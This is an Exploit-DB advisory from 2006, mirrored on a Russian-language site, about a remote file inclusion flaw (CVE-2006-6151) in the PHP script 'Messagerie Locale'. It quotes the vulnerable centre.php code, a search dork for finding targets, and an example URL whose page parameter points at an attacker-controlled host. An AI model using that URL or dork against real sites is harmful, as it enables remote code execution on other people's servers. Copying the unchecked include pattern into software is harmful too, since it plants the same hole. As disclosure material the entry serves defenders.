- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2832
- Проверка EDB
-
- Пройдено
- Автор
- DADISS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6151
- Дата публикации
- 2006-11-23
Код:
#===================================================================================#
#
# Messagerie Locale => (centre.php) $page Remote File Inclusion Exploit
#
#===================================================================================#
#
# Softname : Messagerie Locale
# Url : http://dvmet.free.fr/script/messagerie.zip
# Dork : inurl:indexmess.php
# Exploit type : Remote File Inclusion.
# Critical: Dangerous.
# Solution Status: Unpatched.
#
#===================================================================================#
#
# By DaDIsS - Member of the Moroccan Hackers Team
#
#===================================================================================#
#
# Exploit Explanation :
#
#
# The flaw resides in centre.php file that contain this code :
#
# <?
# if(isset($_GET['page']))
# {
# $page=$_GET['page'];
# }
# else
# {
# $page="";
# }
#
# if (empty($page)||!isset($page))
# {
# include("accueil.php");
# }
# else
# {
# include($page.".php");
# }
#
# ?>
#
#===================================================================================#
#
# Example :
#
#
# http://www.victime.com/(path)/centre.php?page=http://attacker
#
#
#================================================================#
#
# Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !!
#
#===================================================================================#
#
# DaDIsS / [email protected]
# Proud to be a Moroccan !
#
#===================================================================================#
# milw0rm.com [2006-11-23]- Источник
- www.exploit-db.com
